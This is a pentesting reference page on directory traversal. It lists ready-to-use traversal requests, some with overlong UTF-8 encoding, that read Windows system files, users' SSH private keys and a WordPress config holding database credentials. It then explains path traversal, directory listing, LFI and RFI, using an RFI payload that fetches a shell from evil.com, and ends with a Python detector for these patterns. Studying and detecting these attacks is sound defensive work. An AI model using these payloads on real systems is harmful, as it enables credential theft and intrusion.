Directory Traversal

#windows_default_files

Windows files to check:

win.ini standard file

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

System.ini standard file

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/System.ini

Hosts file

curl -s --path-as-is "http://10.10.10.151/blog/?lang=/windows/system32/drivers/etc/hosts"

#different_ssh_keys_names

Get SSH keys:

for id_rsa

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_rsa

for id_ecdsa

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_ecdsa

for id_ed25519

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_ed25519

Windows WordPress config file

If we have a WordPress site with a path traversal, we can read wp-config.php to obtain the database credentials.

http://10.10.15.11:8080/..\..\..\..\..\..\..\xampp\htdocs\blog\wp-config.php

Directory traversal vs Directory Listing vs Path traversal vs LFI vs RFI

  • Directory (or Path) traversal: a class of vulnerability where an attacker manipulates file-path input (for example using .. segments) so the application accesses files outside the intended directory. Often called path traversal or directory traversal (they mean the same thing).

  • Directory listing: a server configuration/behavior where a web server responds to a request for a directory by returning the list of files in that directory (e.g., index file missing and Options +Indexes). This is not necessarily a bug in code; it's an information-exposure configuration issue.

  • LFI (Local File Inclusion): a web-app vulnerability where the application includes or loads a file from the local filesystem (e.g., via include, require, file_get_contents) using user-controllable input. LFI often lets an attacker read or cause execution of local files. LFI can be caused by path traversal (user supplies ../... to reach unexpected files).

  • RFI (Remote File Inclusion): including files from remote URLs. Useful to contrast with LFI.

Path Traversal = Directory Traversal

These terms are synonymous. Both refer to attacks where an attacker manipulates file path references (using ../ sequences) to access files outside the intended directory.

Example:

http://example.com/download?file=../../../etc/passwd
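
An added detection sketch (not part of the original notes): it canonicalizes a request target the way a lenient decoder would and flags the patterns used in the requests above, namely overlong UTF-8 separators such as %c0%af, .. segments with either slash, and the file names this page lists. The function names and sample targets are constructed for illustration; the code generalizes to any 2-byte overlong sequence and to double percent-encoding.

```python
import re
from urllib.parse import unquote_to_bytes

# File names taken from the requests on this page.
SENSITIVE = re.compile(
    rb"(windows/(win|system)\.ini|etc/(hosts|passwd)|"
    rb"\.ssh/id_(rsa|ecdsa|ed25519)|wp-config\.php)", re.I)
# 0xC0/0xC1 never start valid UTF-8; followed by a continuation byte they
# form a 2-byte overlong encoding of an ASCII character (%c0%af -> "/").
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
# ".." as a whole segment, at the start of the path or of a parameter value.
DOTDOT = re.compile(rb"(^|[/=?&])\.\.(/|$)")

def _fold(match):
    b0, b1 = match.group(0)
    return bytes([((b0 & 0x1F) << 6) | (b1 & 0x3F)])

def normalize(target, max_rounds=3):
    """Return (canonical_bytes, saw_overlong) for a raw request target."""
    data, saw_overlong = target.encode("latin-1", "replace"), False
    for _ in range(max_rounds):            # extra rounds unwrap %25-style double encoding
        folded, n = OVERLONG.subn(_fold, unquote_to_bytes(data))
        saw_overlong |= n > 0
        if folded == data:
            break
        data = folded
    return data.replace(b"\\", b"/"), saw_overlong

def classify(target):
    """List the traversal indicators present in one request target."""
    path, overlong = normalize(target)
    findings = ["overlong-utf8"] if overlong else []
    if DOTDOT.search(path):
        findings.append("dot-dot-segment")
    if SENSITIVE.search(path):
        findings.append("sensitive-file")
    return findings

if __name__ == "__main__":
    # Constructed sample targets modelled on the requests shown on this page.
    for line in ["/theme/META-INF/prototype%c0%af..%c0%af..%c0%afwindows/win.ini",
                 "/blog/?lang=/windows/system32/drivers/etc/hosts",
                 "/..\\..\\..\\xampp\\htdocs\\blog\\wp-config.php",
                 "/blog/?lang=en"]:
        print(classify(line), line)
```

Matching on the canonical form rather than the raw string is what catches the encoded variants; the same normalization belongs in front of any allow-list check the application performs.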

Directory Listing

A misconfiguration, not an attack. This occurs when a web server displays the contents of a directory instead of serving a default page (like index.html).

Example: Visiting http://example.com/uploads/ shows:

Index of /uploads/
- file1.pdf
- file2.jpg
- confidential.doc

This exposes file names and structure but doesn't directly read file contents.

LFI (Local File Inclusion)

An attack where the application includes and executes a local file on the server. More severe than path traversal because the file content is processed/executed by the application.

Example (PHP):

include($_GET['page'] . '.php');
// Attack: ?page=../../etc/passwd

RFI (Remote File Inclusion)

Similar to LFI, but the attacker includes a file from a remote server, often containing malicious code.

Example (PHP):

include($_GET['page']);
// Attack: ?page=http://evil.com/shell.php

Key Relationships

| Vulnerability | Reads Files? | Executes Code? | Scope |
|---|---|---|---|
| Directory Listing | No | No | Shows file names |
| Path/Directory Traversal | Yes | No | Reads local files |
| LFI | Yes | Yes | Executes local files |
| RFI | Yes | Yes | Executes remote files |

Attack Chain: Directory Listing → Path Traversal → LFI → RFI (increasing severity)